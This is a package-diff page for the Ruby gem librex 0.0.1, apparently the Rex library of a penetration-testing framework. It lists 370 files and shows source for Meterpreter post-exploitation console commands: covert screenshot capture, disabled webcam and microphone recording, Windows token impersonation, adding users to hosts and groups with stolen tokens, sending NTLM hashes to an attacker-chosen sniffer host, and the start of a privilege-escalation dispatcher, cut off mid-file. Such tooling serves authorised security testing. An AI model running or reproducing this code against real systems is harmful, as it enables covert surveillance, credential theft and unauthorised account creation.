RubyGems - librex - Versions diffs - 0.0.1 - Mend

librex 0.0.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (370) hide show

data/README +4 -0
data/lib/rex.rb +101 -0
data/lib/rex.rb.ts.rb +70 -0
data/lib/rex/LICENSE +29 -0
data/lib/rex/arch.rb +103 -0
data/lib/rex/arch/sparc.rb +75 -0
data/lib/rex/arch/sparc.rb.ut.rb +18 -0
data/lib/rex/arch/x86.rb +513 -0
data/lib/rex/arch/x86.rb.ut.rb +93 -0
data/lib/rex/assembly/nasm.rb +100 -0
data/lib/rex/assembly/nasm.rb.ut.rb +22 -0
data/lib/rex/codepage.map +104 -0
data/lib/rex/compat.rb +281 -0
data/lib/rex/constants.rb +113 -0
data/lib/rex/elfparsey.rb +11 -0
data/lib/rex/elfparsey/elf.rb +123 -0
data/lib/rex/elfparsey/elfbase.rb +260 -0
data/lib/rex/elfparsey/exceptions.rb +27 -0
data/lib/rex/elfscan.rb +12 -0
data/lib/rex/elfscan/scanner.rb +207 -0
data/lib/rex/elfscan/search.rb +46 -0
data/lib/rex/encoder/alpha2.rb +31 -0
data/lib/rex/encoder/alpha2/alpha_mixed.rb +68 -0
data/lib/rex/encoder/alpha2/alpha_upper.rb +79 -0
data/lib/rex/encoder/alpha2/generic.rb +113 -0
data/lib/rex/encoder/alpha2/unicode_mixed.rb +117 -0
data/lib/rex/encoder/alpha2/unicode_upper.rb +129 -0
data/lib/rex/encoder/ndr.rb +89 -0
data/lib/rex/encoder/ndr.rb.ut.rb +44 -0
data/lib/rex/encoder/nonalpha.rb +61 -0
data/lib/rex/encoder/nonupper.rb +64 -0
data/lib/rex/encoder/xdr.rb +106 -0
data/lib/rex/encoder/xdr.rb.ut.rb +29 -0
data/lib/rex/encoder/xor.rb +69 -0
data/lib/rex/encoder/xor/dword.rb +13 -0
data/lib/rex/encoder/xor/dword_additive.rb +13 -0
data/lib/rex/encoders/xor_dword.rb +35 -0
data/lib/rex/encoders/xor_dword_additive.rb +53 -0
data/lib/rex/encoders/xor_dword_additive.rb.ut.rb +12 -0
data/lib/rex/encoding/xor.rb +20 -0
data/lib/rex/encoding/xor.rb.ts.rb +14 -0
data/lib/rex/encoding/xor/byte.rb +15 -0
data/lib/rex/encoding/xor/byte.rb.ut.rb +21 -0
data/lib/rex/encoding/xor/dword.rb +21 -0
data/lib/rex/encoding/xor/dword.rb.ut.rb +15 -0
data/lib/rex/encoding/xor/dword_additive.rb +92 -0
data/lib/rex/encoding/xor/dword_additive.rb.ut.rb +15 -0
data/lib/rex/encoding/xor/exceptions.rb +17 -0
data/lib/rex/encoding/xor/generic.rb +146 -0
data/lib/rex/encoding/xor/generic.rb.ut.rb +120 -0
data/lib/rex/encoding/xor/qword.rb +15 -0
data/lib/rex/encoding/xor/word.rb +21 -0
data/lib/rex/encoding/xor/word.rb.ut.rb +13 -0
data/lib/rex/exceptions.rb +275 -0
data/lib/rex/exceptions.rb.ut.rb +44 -0
data/lib/rex/exploitation/cmdstager.rb +133 -0
data/lib/rex/exploitation/egghunter.rb +143 -0
data/lib/rex/exploitation/egghunter.rb.ut.rb +25 -0
data/lib/rex/exploitation/encryptjs.rb +77 -0
data/lib/rex/exploitation/heaplib.js.b64 +331 -0
data/lib/rex/exploitation/heaplib.rb +94 -0
data/lib/rex/exploitation/javascriptosdetect.rb +735 -0
data/lib/rex/exploitation/obfuscatejs.rb +335 -0
data/lib/rex/exploitation/opcodedb.rb +818 -0
data/lib/rex/exploitation/opcodedb.rb.ut.rb +279 -0
data/lib/rex/exploitation/seh.rb +92 -0
data/lib/rex/exploitation/seh.rb.ut.rb +19 -0
data/lib/rex/file.rb +84 -0
data/lib/rex/file.rb.ut.rb +16 -0
data/lib/rex/image_source.rb +12 -0
data/lib/rex/image_source/disk.rb +60 -0
data/lib/rex/image_source/image_source.rb +46 -0
data/lib/rex/image_source/memory.rb +37 -0
data/lib/rex/io/bidirectional_pipe.rb +157 -0
data/lib/rex/io/datagram_abstraction.rb +35 -0
data/lib/rex/io/stream.rb +313 -0
data/lib/rex/io/stream_abstraction.rb +186 -0
data/lib/rex/io/stream_server.rb +211 -0
data/lib/rex/job_container.rb +202 -0
data/lib/rex/logging.rb +4 -0
data/lib/rex/logging/log_dispatcher.rb +179 -0
data/lib/rex/logging/log_sink.rb +42 -0
data/lib/rex/logging/sinks/flatfile.rb +55 -0
data/lib/rex/logging/sinks/stderr.rb +43 -0
data/lib/rex/machparsey.rb +9 -0
data/lib/rex/machparsey/exceptions.rb +34 -0
data/lib/rex/machparsey/mach.rb +209 -0
data/lib/rex/machparsey/machbase.rb +408 -0
data/lib/rex/machscan.rb +9 -0
data/lib/rex/machscan/scanner.rb +217 -0
data/lib/rex/mime.rb +9 -0
data/lib/rex/mime/header.rb +75 -0
data/lib/rex/mime/message.rb +112 -0
data/lib/rex/mime/part.rb +20 -0
data/lib/rex/nop/opty2.rb +108 -0
data/lib/rex/nop/opty2.rb.ut.rb +23 -0
data/lib/rex/nop/opty2_tables.rb +300 -0
data/lib/rex/ole.rb +128 -0
data/lib/rex/ole/clsid.rb +47 -0
data/lib/rex/ole/difat.rb +141 -0
data/lib/rex/ole/directory.rb +230 -0
data/lib/rex/ole/direntry.rb +240 -0
data/lib/rex/ole/fat.rb +99 -0
data/lib/rex/ole/header.rb +204 -0
data/lib/rex/ole/minifat.rb +77 -0
data/lib/rex/ole/samples/create_ole.rb +27 -0
data/lib/rex/ole/samples/dir.rb +35 -0
data/lib/rex/ole/samples/dump_stream.rb +34 -0
data/lib/rex/ole/samples/ole_info.rb +23 -0
data/lib/rex/ole/storage.rb +395 -0
data/lib/rex/ole/stream.rb +53 -0
data/lib/rex/ole/substorage.rb +49 -0
data/lib/rex/ole/util.rb +157 -0
data/lib/rex/parser/arguments.rb +97 -0
data/lib/rex/parser/arguments.rb.ut.rb +67 -0
data/lib/rex/parser/ini.rb +185 -0
data/lib/rex/parser/ini.rb.ut.rb +29 -0
data/lib/rex/parser/nmap_xml.rb +111 -0
data/lib/rex/payloads.rb +1 -0
data/lib/rex/payloads/win32.rb +2 -0
data/lib/rex/payloads/win32/common.rb +26 -0
data/lib/rex/payloads/win32/kernel.rb +53 -0
data/lib/rex/payloads/win32/kernel/common.rb +54 -0
data/lib/rex/payloads/win32/kernel/migration.rb +12 -0
data/lib/rex/payloads/win32/kernel/recovery.rb +50 -0
data/lib/rex/payloads/win32/kernel/stager.rb +171 -0
data/lib/rex/peparsey.rb +12 -0
data/lib/rex/peparsey/exceptions.rb +32 -0
data/lib/rex/peparsey/pe.rb +188 -0
data/lib/rex/peparsey/pe_memdump.rb +63 -0
data/lib/rex/peparsey/pebase.rb +1655 -0
data/lib/rex/peparsey/section.rb +136 -0
data/lib/rex/pescan.rb +13 -0
data/lib/rex/pescan/analyze.rb +309 -0
data/lib/rex/pescan/scanner.rb +206 -0
data/lib/rex/pescan/search.rb +56 -0
data/lib/rex/platforms.rb +1 -0
data/lib/rex/platforms/windows.rb +51 -0
data/lib/rex/poly.rb +132 -0
data/lib/rex/poly/block.rb +468 -0
data/lib/rex/poly/register.rb +100 -0
data/lib/rex/poly/register/x86.rb +40 -0
data/lib/rex/post.rb +8 -0
data/lib/rex/post/dir.rb +51 -0
data/lib/rex/post/file.rb +172 -0
data/lib/rex/post/file_stat.rb +220 -0
data/lib/rex/post/gen.pl +13 -0
data/lib/rex/post/io.rb +182 -0
data/lib/rex/post/meterpreter.rb +4 -0
data/lib/rex/post/meterpreter/channel.rb +438 -0
data/lib/rex/post/meterpreter/channel_container.rb +54 -0
data/lib/rex/post/meterpreter/channels/pool.rb +160 -0
data/lib/rex/post/meterpreter/channels/pools/file.rb +62 -0
data/lib/rex/post/meterpreter/channels/pools/stream_pool.rb +103 -0
data/lib/rex/post/meterpreter/channels/stream.rb +87 -0
data/lib/rex/post/meterpreter/client.rb +335 -0
data/lib/rex/post/meterpreter/client_core.rb +274 -0
data/lib/rex/post/meterpreter/dependencies.rb +3 -0
data/lib/rex/post/meterpreter/extension.rb +32 -0
data/lib/rex/post/meterpreter/extensions/espia/espia.rb +58 -0
data/lib/rex/post/meterpreter/extensions/espia/tlv.rb +16 -0
data/lib/rex/post/meterpreter/extensions/incognito/incognito.rb +94 -0
data/lib/rex/post/meterpreter/extensions/incognito/tlv.rb +21 -0
data/lib/rex/post/meterpreter/extensions/priv/fs.rb +118 -0
data/lib/rex/post/meterpreter/extensions/priv/passwd.rb +61 -0
data/lib/rex/post/meterpreter/extensions/priv/priv.rb +104 -0
data/lib/rex/post/meterpreter/extensions/priv/tlv.rb +28 -0
data/lib/rex/post/meterpreter/extensions/sniffer/sniffer.rb +100 -0
data/lib/rex/post/meterpreter/extensions/sniffer/tlv.rb +24 -0
data/lib/rex/post/meterpreter/extensions/stdapi/constants.rb +333 -0
data/lib/rex/post/meterpreter/extensions/stdapi/fs/dir.rb +273 -0
data/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb +235 -0
data/lib/rex/post/meterpreter/extensions/stdapi/fs/file_stat.rb +103 -0
data/lib/rex/post/meterpreter/extensions/stdapi/fs/io.rb +48 -0
data/lib/rex/post/meterpreter/extensions/stdapi/net/config.rb +144 -0
data/lib/rex/post/meterpreter/extensions/stdapi/net/interface.rb +73 -0
data/lib/rex/post/meterpreter/extensions/stdapi/net/route.rb +56 -0
data/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb +137 -0
data/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb +167 -0
data/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_server_channel.rb +167 -0
data/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/udp_channel.rb +192 -0
data/lib/rex/post/meterpreter/extensions/stdapi/stdapi.rb +139 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb +97 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log.rb +184 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log_subsystem/event_record.rb +41 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/power.rb +61 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb +361 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/image.rb +129 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/io.rb +55 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/memory.rb +336 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/thread.rb +141 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry.rb +279 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_key.rb +182 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_value.rb +102 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/thread.rb +174 -0
data/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb +185 -0
data/lib/rex/post/meterpreter/extensions/stdapi/ui.rb +227 -0
data/lib/rex/post/meterpreter/inbound_packet_handler.rb +30 -0
data/lib/rex/post/meterpreter/object_aliases.rb +83 -0
data/lib/rex/post/meterpreter/packet.rb +596 -0
data/lib/rex/post/meterpreter/packet_dispatcher.rb +409 -0
data/lib/rex/post/meterpreter/packet_parser.rb +94 -0
data/lib/rex/post/meterpreter/packet_response_waiter.rb +83 -0
data/lib/rex/post/meterpreter/ui/console.rb +135 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher.rb +62 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb +595 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/espia.rb +108 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb +241 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv.rb +61 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/elevate.rb +98 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/passwd.rb +51 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/timestomp.rb +132 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/sniffer.rb +187 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi.rb +63 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb +376 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb +270 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb +484 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb +315 -0
data/lib/rex/post/meterpreter/ui/console/interactive_channel.rb +95 -0
data/lib/rex/post/permission.rb +26 -0
data/lib/rex/post/process.rb +57 -0
data/lib/rex/post/thread.rb +57 -0
data/lib/rex/post/ui.rb +52 -0
data/lib/rex/proto.rb +12 -0
data/lib/rex/proto.rb.ts.rb +8 -0
data/lib/rex/proto/dcerpc.rb +6 -0
data/lib/rex/proto/dcerpc.rb.ts.rb +9 -0
data/lib/rex/proto/dcerpc/client.rb +358 -0
data/lib/rex/proto/dcerpc/client.rb.ut.rb +491 -0
data/lib/rex/proto/dcerpc/exceptions.rb +150 -0
data/lib/rex/proto/dcerpc/handle.rb +47 -0
data/lib/rex/proto/dcerpc/handle.rb.ut.rb +85 -0
data/lib/rex/proto/dcerpc/ndr.rb +72 -0
data/lib/rex/proto/dcerpc/ndr.rb.ut.rb +41 -0
data/lib/rex/proto/dcerpc/packet.rb +253 -0
data/lib/rex/proto/dcerpc/packet.rb.ut.rb +56 -0
data/lib/rex/proto/dcerpc/response.rb +186 -0
data/lib/rex/proto/dcerpc/response.rb.ut.rb +15 -0
data/lib/rex/proto/dcerpc/uuid.rb +84 -0
data/lib/rex/proto/dcerpc/uuid.rb.ut.rb +46 -0
data/lib/rex/proto/drda.rb +5 -0
data/lib/rex/proto/drda.rb.ts.rb +17 -0
data/lib/rex/proto/drda/constants.rb +49 -0
data/lib/rex/proto/drda/constants.rb.ut.rb +23 -0
data/lib/rex/proto/drda/packet.rb +252 -0
data/lib/rex/proto/drda/packet.rb.ut.rb +109 -0
data/lib/rex/proto/drda/utils.rb +123 -0
data/lib/rex/proto/drda/utils.rb.ut.rb +84 -0
data/lib/rex/proto/http.rb +5 -0
data/lib/rex/proto/http.rb.ts.rb +12 -0
data/lib/rex/proto/http/client.rb +817 -0
data/lib/rex/proto/http/client.rb.ut.rb +93 -0
data/lib/rex/proto/http/handler.rb +46 -0
data/lib/rex/proto/http/handler/erb.rb +128 -0
data/lib/rex/proto/http/handler/erb.rb.ut.rb +21 -0
data/lib/rex/proto/http/handler/erb.rb.ut.rb.rhtml +1 -0
data/lib/rex/proto/http/handler/proc.rb +54 -0
data/lib/rex/proto/http/handler/proc.rb.ut.rb +24 -0
data/lib/rex/proto/http/header.rb +161 -0
data/lib/rex/proto/http/header.rb.ut.rb +46 -0
data/lib/rex/proto/http/packet.rb +394 -0
data/lib/rex/proto/http/packet.rb.ut.rb +165 -0
data/lib/rex/proto/http/request.rb +356 -0
data/lib/rex/proto/http/request.rb.ut.rb +214 -0
data/lib/rex/proto/http/response.rb +85 -0
data/lib/rex/proto/http/response.rb.ut.rb +149 -0
data/lib/rex/proto/http/server.rb +367 -0
data/lib/rex/proto/http/server.rb.ut.rb +79 -0
data/lib/rex/proto/smb.rb +7 -0
data/lib/rex/proto/smb.rb.ts.rb +8 -0
data/lib/rex/proto/smb/client.rb +1733 -0
data/lib/rex/proto/smb/client.rb.ut.rb +223 -0
data/lib/rex/proto/smb/constants.rb +1062 -0
data/lib/rex/proto/smb/constants.rb.ut.rb +18 -0
data/lib/rex/proto/smb/crypt.rb +95 -0
data/lib/rex/proto/smb/crypt.rb.ut.rb +20 -0
data/lib/rex/proto/smb/evasions.rb +65 -0
data/lib/rex/proto/smb/exceptions.rb +846 -0
data/lib/rex/proto/smb/simpleclient.rb +292 -0
data/lib/rex/proto/smb/simpleclient.rb.ut.rb +128 -0
data/lib/rex/proto/smb/utils.rb +514 -0
data/lib/rex/proto/smb/utils.rb.ut.rb +20 -0
data/lib/rex/proto/sunrpc.rb +1 -0
data/lib/rex/proto/sunrpc/client.rb +195 -0
data/lib/rex/script.rb +42 -0
data/lib/rex/script/base.rb +59 -0
data/lib/rex/script/meterpreter.rb +9 -0
data/lib/rex/script/shell.rb +9 -0
data/lib/rex/service.rb +48 -0
data/lib/rex/service_manager.rb +141 -0
data/lib/rex/service_manager.rb.ut.rb +32 -0
data/lib/rex/services/local_relay.rb +423 -0
data/lib/rex/socket.rb +586 -0
data/lib/rex/socket.rb.ut.rb +86 -0
data/lib/rex/socket/comm.rb +119 -0
data/lib/rex/socket/comm/local.rb +409 -0
data/lib/rex/socket/comm/local.rb.ut.rb +75 -0
data/lib/rex/socket/ip.rb +129 -0
data/lib/rex/socket/parameters.rb +345 -0
data/lib/rex/socket/parameters.rb.ut.rb +51 -0
data/lib/rex/socket/range_walker.rb +295 -0
data/lib/rex/socket/range_walker.rb.ut.rb +55 -0
data/lib/rex/socket/ssl_tcp.rb +184 -0
data/lib/rex/socket/ssl_tcp.rb.ut.rb +39 -0
data/lib/rex/socket/ssl_tcp_server.rb +122 -0
data/lib/rex/socket/ssl_tcp_server.rb.ut.rb +51 -0
data/lib/rex/socket/subnet_walker.rb +75 -0
data/lib/rex/socket/subnet_walker.rb.ut.rb +28 -0
data/lib/rex/socket/switch_board.rb +272 -0
data/lib/rex/socket/switch_board.rb.ut.rb +52 -0
data/lib/rex/socket/tcp.rb +76 -0
data/lib/rex/socket/tcp.rb.ut.rb +64 -0
data/lib/rex/socket/tcp_server.rb +67 -0
data/lib/rex/socket/tcp_server.rb.ut.rb +44 -0
data/lib/rex/socket/udp.rb +157 -0
data/lib/rex/socket/udp.rb.ut.rb +44 -0
data/lib/rex/struct2.rb +5 -0
data/lib/rex/struct2/c_struct.rb +181 -0
data/lib/rex/struct2/c_struct_template.rb +39 -0
data/lib/rex/struct2/constant.rb +26 -0
data/lib/rex/struct2/element.rb +44 -0
data/lib/rex/struct2/generic.rb +73 -0
data/lib/rex/struct2/restraint.rb +54 -0
data/lib/rex/struct2/s_string.rb +72 -0
data/lib/rex/struct2/s_struct.rb +111 -0
data/lib/rex/sync.rb +6 -0
data/lib/rex/sync/event.rb +94 -0
data/lib/rex/sync/read_write_lock.rb +176 -0
data/lib/rex/sync/ref.rb +57 -0
data/lib/rex/sync/thread_safe.rb +82 -0
data/lib/rex/test.rb +35 -0
data/lib/rex/text.rb +1029 -0
data/lib/rex/text.rb.ut.rb +168 -0
data/lib/rex/time.rb +65 -0
data/lib/rex/transformer.rb +115 -0
data/lib/rex/transformer.rb.ut.rb +38 -0
data/lib/rex/ui.rb +21 -0
data/lib/rex/ui/interactive.rb +252 -0
data/lib/rex/ui/output.rb +80 -0
data/lib/rex/ui/output/none.rb +18 -0
data/lib/rex/ui/progress_tracker.rb +96 -0
data/lib/rex/ui/subscriber.rb +149 -0
data/lib/rex/ui/text/color.rb +97 -0
data/lib/rex/ui/text/color.rb.ut.rb +18 -0
data/lib/rex/ui/text/dispatcher_shell.rb +382 -0
data/lib/rex/ui/text/input.rb +117 -0
data/lib/rex/ui/text/input/buffer.rb +75 -0
data/lib/rex/ui/text/input/readline.rb +129 -0
data/lib/rex/ui/text/input/socket.rb +95 -0
data/lib/rex/ui/text/input/stdio.rb +45 -0
data/lib/rex/ui/text/irb_shell.rb +55 -0
data/lib/rex/ui/text/output.rb +80 -0
data/lib/rex/ui/text/output/buffer.rb +65 -0
data/lib/rex/ui/text/output/file.rb +37 -0
data/lib/rex/ui/text/output/socket.rb +43 -0
data/lib/rex/ui/text/output/stdio.rb +40 -0
data/lib/rex/ui/text/progress_tracker.rb +56 -0
data/lib/rex/ui/text/progress_tracker.rb.ut.rb +34 -0
data/lib/rex/ui/text/shell.rb +321 -0
data/lib/rex/ui/text/table.rb +254 -0
data/lib/rex/ui/text/table.rb.ut.rb +55 -0
data/lib/rex/zip.rb +93 -0
data/lib/rex/zip/archive.rb +91 -0
data/lib/rex/zip/blocks.rb +182 -0
data/lib/rex/zip/entry.rb +95 -0
data/lib/rex/zip/samples/comment.rb +32 -0
data/lib/rex/zip/samples/mkwar.rb +138 -0
data/lib/rex/zip/samples/mkzip.rb +19 -0
data/lib/rex/zip/samples/recursive.rb +58 -0
metadata +435 -0

data/lib/rex/post/meterpreter/ui/console/command_dispatcher/espia.rb ADDED

@@ -0,0 +1,108 @@
+require 'rex/post/meterpreter'
+module Rex
+module Post
+module Meterpreter
+module Ui
+###
+#
+# Espia - Capture audio, video, screenshots from the remote system
+#
+###
+class Console::CommandDispatcher::Espia
+	Klass = Console::CommandDispatcher::Espia
+	include Console::CommandDispatcher
+	#
+	# Initializes an instance of the espia command interaction.
+	#
+	def initialize(shell)
+		super
+	end
+	#
+	# List of supported commands.
+	#
+	def commands
+		{
+	#		"dev_image"  => "Attempt to grab a frame from webcam",
+	#		"dev_audio"  => "Attempt to record microphone audio",
+			"screengrab" => "Attempt to grab screen shot from process's active desktop"
+		}
+	end
+	def cmd_dev_image()
+		client.espia.espia_video_get_dev_image()
+		print_line("[*] Done.")
+		return true
+	end
+	def cmd_dev_audio(*args)
+		maxrec = 60
+		if (args.length < 1)
+			print_line("Usage: dev_audio <rec_secs>\n")
+			print_line("Record mic audio\n")
+			return true
+		end
+		secs = args[0].to_i
+		if secs  > 0 and secs <= maxrec
+			milsecs = secs*1000
+			print_line("[*] Recording #{milsecs} miliseconds.\n")
+			client.espia.espia_audio_get_dev_audio(milsecs)
+			print_line("[*] Done.")
+		else
+			print_line("[-] Error: Recording time 0 to 60 secs \n")
+		end
+		return true
+	end
+	#
+	# Grab a screenshot of the current interactive desktop.
+	#
+	def cmd_screengrab( *args )
+		if( args[0] and args[0] == "-h" )
+			print_line("Usage: screengrab <path.jpeg> [view in browser: true|false]\n")
+			print_line("Grab a screenshot of the current interactive desktop.\n")
+			return true
+		end
+		show = true
+		show = false if (args[1] and args[1] =~ /^(f|n|0)/i)
+		path = args[0] || Rex::Text.rand_text_alpha(8) + ".jpeg"
+		data = client.espia.espia_image_get_dev_screen
+		if( data )
+			::File.open( path, 'wb' ) do |fd|
+				fd.write( data )
+			end
+			path = ::File.expand_path( path )
+			print_line( "Screenshot saved to: #{path}" )
+			Rex::Compat.open_file( path ) if show
+		end
+		return true
+	end
+	#
+	# Name for this dispatcher
+	#
+	def name
+		"Espia"
+	end
+end
+end
+end
+end
+end

data/lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb ADDED

@@ -0,0 +1,241 @@
+require 'rex/post/meterpreter'
+module Rex
+module Post
+module Meterpreter
+module Ui
+###
+#
+# Privilege escalation extension user interface.
+#
+###
+class Console::CommandDispatcher::Incognito
+	Klass = Console::CommandDispatcher::Incognito
+	include Console::CommandDispatcher
+	#
+	# Initializes an instance of the priv command interaction.
+	#
+	def initialize(shell)
+		super
+	end
+	#
+	# List of supported commands.
+	#
+	def commands
+		{
+			"add_user" => "Attempt to add a user with all tokens",
+			"add_localgroup_user" => "Attempt to add a user to a local group with all tokens",
+			"add_group_user" => "Attempt to add a user to a global group with all tokens",
+			"list_tokens" => "List tokens available under current user context",
+			"impersonate_token" => "Impersonate specified token",
+			"snarf_hashes" => "Snarf challenge/response hashes for every token"
+		}
+	end
+	@@add_user_opts = Rex::Parser::Arguments.new(
+		"-h" => [ true,  "Add user to remote host" ])
+	@@add_localgroup_user_opts = Rex::Parser::Arguments.new(
+		"-h" => [ true,  "Add user to local group on remote host" ])
+	@@add_group_user_opts = Rex::Parser::Arguments.new(
+		"-h" => [ true,  "Add user to global group on remote host" ])
+	@@list_tokens_opts = Rex::Parser::Arguments.new(
+		"-u" => [ false,  "List tokens by unique username" ],
+		"-g" => [ false, "List tokens by unique groupname" ])
+	def cmd_list_tokens(*args)
+		token_order = -1
+		@@list_tokens_opts.parse(args) { |opt, idx, val|
+			case opt
+				when "-u"
+					token_order = 0
+				when "-g"
+					token_order = 1
+			end
+		}
+		if (token_order == -1)
+			print_line("Usage: list_tokens <list_order_option>\n")
+			print_line("Lists all accessible tokens and their privilege level")
+			print_line(@@list_tokens_opts.usage)
+			return
+		end
+		system_privilege_check
+		tokens = client.incognito.incognito_list_tokens(token_order)
+		print_line()
+		print_line("Delegation Tokens Available")
+		print_line("========================================")
+		tokens['delegation'].each_line { |string|
+			print(string)
+		}
+		print_line()
+		print_line("Impersonation Tokens Available")
+		print_line("========================================")
+		tokens['impersonation'].each_line { |string|
+			print(string)
+		}
+		print_line()
+		return true
+	end
+	def cmd_impersonate_token(*args)
+		if (args.length < 1)
+			print_line("Usage: impersonate_token <token>\n")
+			print_line("Instructs the meterpreter thread to impersonate the specified token. All other actions will then be made in the context of that token.\n")
+			print_line("Hint: Double backslash DOMAIN\\\\name (meterpreter quirk)")
+			print_line("Hint: Enclose with quotation marks if name contains a space\n")
+			return
+		end
+		system_privilege_check
+		username = args[0]
+		client.incognito.incognito_impersonate_token(username).each_line { |string|
+			print(string)
+		}
+		return true
+	end
+	def cmd_add_user(*args)
+		# Default to localhost
+		host = "127.0.0.1"
+		@@add_user_opts.parse(args) { |opt, idx, val|
+			case opt
+				when "-h"
+					host = val
+			end
+		}
+		if (args.length < 2)
+			print_line("Usage: add_user <username> <password> [options]\n")
+			print_line("Attempts to add a user to a host with all accessible tokens. Terminates when successful, an error that is not access denied occurs (e.g. password does not meet complexity requirements) or when all tokens are exhausted")
+			print_line(@@add_user_opts.usage)
+			return
+		end
+		system_privilege_check
+		username = args[0]
+		password = args[1]
+		client.incognito.incognito_add_user(host, username, password).each_line { |string|
+			print(string)
+		}
+		return true
+	end
+	def cmd_add_localgroup_user(*args)
+		# Default to localhost
+		host = "127.0.0.1"
+		@@add_localgroup_user_opts.parse(args) { |opt, idx, val|
+			case opt
+				when "-h"
+					host = val
+			end
+		}
+		if (args.length < 2)
+			print_line("Usage: add_localgroup_user <groupname> <username> [options]\n")
+			print_line("Attempts to add a user to a local group on a host with all accessible tokens. Terminates when successful, an error that is not access denied occurs (e.g. user not found) or when all tokens are exhausted")
+			print_line(@@add_localgroup_user_opts.usage)
+			return
+		end
+		system_privilege_check
+		groupname = args[0]
+		username = args[1]
+		client.incognito.incognito_add_localgroup_user(host, groupname, username).each_line { |string|
+			print(string)
+		}
+		return true
+	end
+	def cmd_add_group_user(*args)
+		# Default to localhost
+		host = "127.0.0.1"
+		@@add_group_user_opts.parse(args) { |opt, idx, val|
+			case opt
+				when "-h"
+					host = val
+			end
+		}
+		if (args.length < 2)
+			print_line("Usage: add_group_user <groupname> <username> [options]\n")
+			print_line("Attempts to add a user to a global group on a host with all accessible tokens. Terminates when successful, an error that is not access denied occurs (e.g. user not found) or when all tokens are exhausted")
+			print_line(@@add_group_user_opts.usage)
+			return
+		end
+		system_privilege_check
+		groupname = args[0]
+		username = args[1]
+		client.incognito.incognito_add_group_user(host, groupname, username).each_line { |string|
+			print(string)
+		}
+		return true
+	end
+	def cmd_snarf_hashes(*args)
+		if (args.length < 1)
+			print_line("Usage: snarf_hashes <sniffer_host>\n")
+			print_line("Captures LANMAN/NTLM challenge response hashes by making SMB requests to the supplied sniffing host with every accessible token.\n")
+			return
+		end
+		system_privilege_check
+		print_line("[*] Snarfing token hashes...")
+		client.incognito.incognito_snarf_hashes(args[0])
+		print_line("[*] Done. Check sniffer logs")
+		return true
+	end
+	def system_privilege_check
+		if (client.sys.config.getuid != "NT AUTHORITY\\SYSTEM")
+			print_line("[-] Warning: Not currently running as SYSTEM, not all tokens will be available")
+			print_line("             Call rev2self if primary process token is SYSTEM")
+		end
+	end
+	#
+	# Name for this dispatcher
+	#
+	def name
+		"Incognito"
+	end
+end
+end
+end
+end
+end

data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv.rb ADDED

@@ -0,0 +1,61 @@
+require 'rex/post/meterpreter'
+module Rex
+module Post
+module Meterpreter
+module Ui
+###
+#
+# Privilege escalation extension user interface.
+#
+###
+class Console::CommandDispatcher::Priv
+	require 'rex/post/meterpreter/ui/console/command_dispatcher/priv/elevate'
+	require 'rex/post/meterpreter/ui/console/command_dispatcher/priv/passwd'
+	require 'rex/post/meterpreter/ui/console/command_dispatcher/priv/timestomp'
+	Klass = Console::CommandDispatcher::Priv
+	Dispatchers =
+		[
+			Klass::Elevate,
+			Klass::Passwd,
+			Klass::Timestomp,
+		]
+	include Console::CommandDispatcher
+	#
+	# Initializes an instance of the priv command interaction.
+	#
+	def initialize(shell)
+		super
+		Dispatchers.each { |d|
+			shell.enstack_dispatcher(d)
+		}
+	end
+	#
+	# List of supported commands.
+	#
+	def commands
+		{
+		}
+	end
+	#
+	# Name for this dispatcher
+	#
+	def name
+		"Privilege Escalation"
+	end
+end
+end
+end
+end
+end

data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/elevate.rb ADDED

@@ -0,0 +1,98 @@
+require 'rex/post/meterpreter'
+module Rex
+module Post
+module Meterpreter
+module Ui
+###
+#
+# The local privilege escalation portion of the extension.
+#
+###
+class Console::CommandDispatcher::Priv::Elevate
+	Klass = Console::CommandDispatcher::Priv::Elevate
+	include Console::CommandDispatcher
+	ELEVATE_TECHNIQUE_NONE					= -1
+	ELEVATE_TECHNIQUE_ANY					= 0
+	ELEVATE_TECHNIQUE_SERVICE_NAMEDPIPE		= 1
+	ELEVATE_TECHNIQUE_SERVICE_NAMEDPIPE2	= 2
+	ELEVATE_TECHNIQUE_SERVICE_TOKENDUP		= 3
